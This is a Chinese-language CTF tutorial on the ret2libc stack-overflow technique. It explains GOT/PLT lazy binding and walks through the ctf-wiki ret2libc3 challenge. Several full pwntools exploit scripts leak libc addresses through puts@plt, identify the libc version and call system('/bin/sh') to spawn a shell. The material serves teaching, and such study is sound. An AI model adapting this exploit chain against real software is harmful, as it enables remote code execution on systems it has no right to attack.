前言

之前曾在Pwn入門(mén)之基礎(chǔ)棧溢出里面曾經(jīng)提過(guò)ret2libc的相關(guān)知識(shí)，但是寫(xiě)的比較籠統(tǒng)，感覺(jué)對(duì)新手還是不夠友好，想通過(guò)本文對(duì)ret2libc的原理和利用進(jìn)行詳細(xì)講解。

前置知識(shí)

GOT表和PLT表

got表也叫全局偏移表（Global Offset Table）是Linux ELF文件中用于定位全局變量和函數(shù)的一個(gè)表。

plt表也叫過(guò)程鏈接表（Procedure Linkage Table）是Linux ELF文件中用于延遲綁定的表惡，即函數(shù)第一次被調(diào)用的時(shí)候才進(jìn)行綁定。

在程序運(yùn)行過(guò)程中，plt表和got表的運(yùn)行過(guò)程大致如下：

用一句話(huà)來(lái)總結(jié)就是，可執(zhí)行文件里保存的是plt表的地址，對(duì)應(yīng)plt地址指向的是got的地址，got表指向的是glibc中的地址

在這里如果需要通過(guò)plt表獲取函數(shù)的地址，需要保證got表已經(jīng)獲取了正確的地址，但如果一開(kāi)始對(duì)所有函數(shù)都進(jìn)行了重定位是比較麻煩且浪費(fèi)資源，為此，Linux引入了延遲綁定機(jī)制。

延遲綁定

這種機(jī)制存在的目的是glibc為了節(jié)約系統(tǒng)資源，提高性能。其詳細(xì)過(guò)程如下

源程序在第一次調(diào)用一個(gè)函數(shù)時(shí)，首先去

如果存在一個(gè)tide函數(shù)，這個(gè)函數(shù)在plt中的條目為tide@plt，在got中的條目為tide@got，那么在第一次調(diào)用bar函數(shù)時(shí)，首先會(huì)跳轉(zhuǎn)到plt，偽代碼如下：

tide@plt; jmptide@got patchtide@got

這里會(huì)從PLT跳到GOT，如果函數(shù)從來(lái)沒(méi)有調(diào)用過(guò)，那這時(shí)GOT會(huì)跳轉(zhuǎn)回PLT并調(diào)用patch tide@got，這行代碼的作用是將bar函數(shù)真正的地址填充到tide@got，然后跳轉(zhuǎn)到bar函數(shù)真正的地址執(zhí)行代碼。當(dāng)下次再次調(diào)用bar函數(shù)的時(shí)候，執(zhí)行路徑就是先跳轉(zhuǎn)到tide@plt、tide@got、tide真正的地址。

簡(jiǎn)而言之就是，當(dāng)一個(gè)函數(shù)被調(diào)用過(guò)后，got表里保存了他在內(nèi)存中的地址，可以通過(guò)泄漏got表內(nèi)存來(lái)泄漏函數(shù)地址，然后可以根據(jù)起泄漏的函數(shù)地址獲得其libc版本，從而計(jì)算其他函數(shù)在內(nèi)存空間中的地址。因?yàn)閘ibc中任意兩個(gè)函數(shù)之間的偏移是固定的。

以計(jì)算system函數(shù)在內(nèi)存空間中的函數(shù)地址舉例。

1. 1.獲取__libc_start_main函數(shù)在內(nèi)存空間中的地址addr_main
2. 2.__libc_start_main函數(shù)相對(duì)于libc.so.6的起始地址是addr_main_offset
3. 3.system函數(shù)相對(duì)于libc.so.6的起始地址是addr_system_offset
4. 4.則system函數(shù)在內(nèi)存中真正的地址為addr_main+addr_system_offset-addr_main_offset

在我們r(jià)et2libc中我們只需要理解為，只有執(zhí)行過(guò)的函數(shù)，我們才能通過(guò)got表泄漏其地址。

基本思路

ret2libc是控制函數(shù)執(zhí)行l(wèi)ibc中的函數(shù)，通常是返回至某個(gè)函數(shù)的plt處。一般情況下，會(huì)選擇執(zhí)行system('/bin/sh')，因此需要找到system函數(shù)的地址 看到這里相信有的師傅就會(huì)問(wèn)了，為什么不能直接跳到got表，通過(guò)前面的前置知識(shí)我們知道plt表中的地址對(duì)應(yīng)的是指令，got表中的地址對(duì)應(yīng)的是指令地址，而返回地址必須保存一段有效的匯編指令，所以必須要用plt表 ret2libc通?？梢苑譃橄旅鎺追N類(lèi)型：

• ?程序中自身包含system函數(shù)和"/bin/sh"字符串
• ?程序中自身就有system函數(shù)，但是沒(méi)有"/bin/sh"字符串
• ?程序中自身沒(méi)有syetem函數(shù)和"/bin/sh"字符串，但給出了libc.so文件
• ?程序中自身沒(méi)有sysetm函數(shù)和"/bin/sh"字符串，并且沒(méi)有給出libc.so文件

針對(duì)前面那三種在前面的文章中已經(jīng)進(jìn)行過(guò)詳細(xì)講解，本文主要是針對(duì)第四種情況進(jìn)行講解 對(duì)于沒(méi)有給出libc.so文件的程序，我們可以通過(guò)泄漏出程序當(dāng)中的某個(gè)函數(shù)的地址，通過(guò)查詢(xún)來(lái)找出其中使用lib.so版本是哪一個(gè)，然后根據(jù)lib.so的版本去找到我們需要的system函數(shù)的地址。 針對(duì)常見(jiàn)的題目我們的解題思路是這樣的：

1. 1.利用棧溢出及puts函數(shù)泄漏出在got表中__libc_start_main函數(shù)的地址
2. 2.puts函數(shù)的返回地址為_(kāi)start函數(shù)
3. 3.利用最低的12位找出libc版本（即使程序有ASLR保護(hù)，也只是針對(duì)地址中間位進(jìn)行隨機(jī)，最低的12位并不會(huì)發(fā)生改變）
4. 4.利用找到的libc版本計(jì)算system函數(shù)和/bin/sh字符串在內(nèi)存中的正確的地址

實(shí)戰(zhàn)

我們還是利用ctfwiki中的ret2libc3進(jìn)行講解 分析程序 根據(jù)前面分析的，我們需要找到如下幾個(gè)地址

• ?__libc_start_main函數(shù)在got表的地址
• ?_start函數(shù)的地址
• ?puts函數(shù)在plt表中的地址

__libc_start_main函數(shù)在got表中的地址_start函數(shù)的地址puts函數(shù)在plt表中的地址 獲取到這三個(gè)地址后，我們可以采用調(diào)用puts函數(shù)后，ret到main函數(shù)，用main函數(shù)里面的gets來(lái)獲取libc_start的地址 獲取libc_start地址的腳本如下

frompwnimport* sh=process('./ret2libc3') puts_plt=0x8048460 addr_start=0x80484d0 got_libc_start=0x804a024 payload=112*b'a'+p32(puts_plt)+p32(addr_start)+p32(got_libc_start) sh.recv() sh.sendline(payload) puts_addr=u32(sh.recv(4)) success("__libc_start_addris:"+hex(puts_addr)) sh.recv() 即使程序有ASLR保護(hù)，也只是針對(duì)地址中間位進(jìn)行隨機(jī)，最低的12位并不會(huì)發(fā)生改變，在16進(jìn)制中也就是我們的最后3位，因此cd0是不會(huì)變，使用libc database search(https://libc.blukat.me/)進(jìn)行查詢(xún)（網(wǎng)上普遍推薦的是利用LibcSearcher，但是我用LibcSearcher一直沒(méi)打通） 看到這么多l(xiāng)ibc版本挨個(gè)試可能會(huì)累死，于是再來(lái)泄漏個(gè)puts的地址

frompwnimport* sh=process('./ret2libc3') puts_plt=0x8048460 addr_start=0x80484d0 got_libc_start=0x804a024 got_puts=0x804a018 #獲取__libc_start的地址 payload1=112*b'a'+p32(puts_plt)+p32(addr_start)+p32(got_libc_start) sh.recv() sh.sendline(payload1) libc_start_addr=u32(sh.recv(4)) success("__libc_start_addris:"+hex(libc_start_addr)) #獲取puts的地址 payload2=112*b'a'+p32(puts_plt)+p32(addr_start)+p32(got_puts) sh.recv() sh.sendline(payload2) puts_addr=u32(sh.recv(4)) success("puts_addris:"+hex(puts_addr)) 還剩下三個(gè)了，使用下面的腳本挨個(gè)嘗試吧

frompwnimport* sh=process('./ret2libc3') puts_plt=0x8048460 addr_start=0x80484d0 got_libc_start=0x804a024 got_puts=0x804a018 #獲取__libc_start的地址 payload1=112*b'a'+p32(puts_plt)+p32(addr_start)+p32(got_libc_start) sh.recv() sh.sendline(payload1) libc_start_addr=u32(sh.recv(4)) success("__libc_start_addris:"+hex(libc_start_addr)) #獲取puts的地址 payload2=112*b'a'+p32(puts_plt)+p32(addr_start)+p32(got_puts) sh.recv() sh.sendline(payload2) puts_addr=u32(sh.recv(4)) success("puts_addris:"+hex(puts_addr)) sh.recv() libc_start=#通過(guò)libcdatabasesearch獲取 libc_system=#通過(guò)libcdatabasesearch獲取 libc_binsh=#通過(guò)libcdatabasesearch獲取 libcbase=libc_start_addr-libc_start system_addr=libcbase+libc_system binsh_addr=libcbase+libc_binsh payload=112*b'a'+p32(system_addr)+4*b'a'+p32(binsh_addr) sh.sendline(payload) sh.interactive() 最終經(jīng)過(guò)多次實(shí)驗(yàn)可知，libc文件是libc6_2.31-0ubuntu9_i386 最終的完整腳本如下

frompwnimport* sh=process('./ret2libc3') puts_plt=0x8048460 addr_start=0x80484d0 got_libc_start=0x804a024 got_puts=0x804a018 #獲取__libc_start的地址 payload1=112*b'a'+p32(puts_plt)+p32(addr_start)+p32(got_libc_start) sh.recv() sh.sendline(payload1) libc_start_addr=u32(sh.recv(4)) success("__libc_start_addris:"+hex(libc_start_addr)) #獲取puts的地址 payload2=112*b'a'+p32(puts_plt)+p32(addr_start)+p32(got_puts) sh.recv() sh.sendline(payload2) puts_addr=u32(sh.recv(4)) success("puts_addris:"+hex(puts_addr)) sh.recv() libc_start=0x01edf0 libc_system=0x045830 libc_binsh=0x192352 libcbase=libc_start_addr-libc_start system_addr=libcbase+libc_system binsh_addr=libcbase+libc_binsh payload=112*b'a'+p32(system_addr)+4*b'a'+p32(binsh_addr) sh.sendline(payload) sh.interactive() 成功打通

總結(jié)

ret2libc這種題型，相較于前面簡(jiǎn)單的題目，對(duì)Linux中程序運(yùn)行的理解要求更高，一開(kāi)始根據(jù)網(wǎng)上的教程去尋找libc版本的時(shí)候發(fā)現(xiàn)大多數(shù)教程都是使用腳本去獲取，但在自己嘗試的時(shí)候就一直打不通，于是便放棄了腳本采用手工的方式進(jìn)行查找，可能相較于通過(guò)腳本直接獲取更加費(fèi)時(shí)費(fèi)力，但是也通過(guò)這個(gè)倒逼自己將got表和plt表的相關(guān)知識(shí)徹底理解透徹，也捋清楚了程序在Linux中到底是如何運(yùn)行的。 審核編輯 ：李倩